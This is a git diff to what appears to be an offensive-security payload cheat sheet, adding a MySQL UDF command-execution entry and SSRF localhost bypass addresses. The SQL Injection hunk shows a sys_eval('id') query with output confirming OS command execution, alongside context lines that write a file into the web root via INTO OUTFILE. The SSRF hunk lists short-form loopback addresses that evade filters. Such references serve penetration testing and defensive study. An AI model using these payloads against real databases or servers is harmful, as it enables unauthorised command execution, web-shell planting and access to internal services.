diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index cbae419..b5e5ee1 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -21,6 +21,7 @@ * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) +* [MYSQL UDF command execution](#mysql-udf-command-execution) * [MYSQL Truncation](#mysql-truncation) * [MYSQL Out of band](#mysql-out-of-band) * [DNS exfiltration](#dns-exfiltration) @@ -250,6 +251,29 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' SELECT sys_eval('id'); ++--------------------------------------------------+ +| sys_eval('id') | ++--------------------------------------------------+ +| uid=118(mysql) gid=128(mysql) groups=128(mysql) | ++--------------------------------------------------+ +``` + + ## MYSQL Out of band ```powershell diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 3bc09a1..ad9bc9f 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -136,10 +136,12 @@ localhost:+11211aaa localhost:00011211aaaa ``` -Bypass using rare address +Bypass using rare address, you can short-hand IP addresses by dropping the zeros ```powershell http://0/ +http://127.1 +http://127.0.1 ``` Bypass using bash variables (curl only)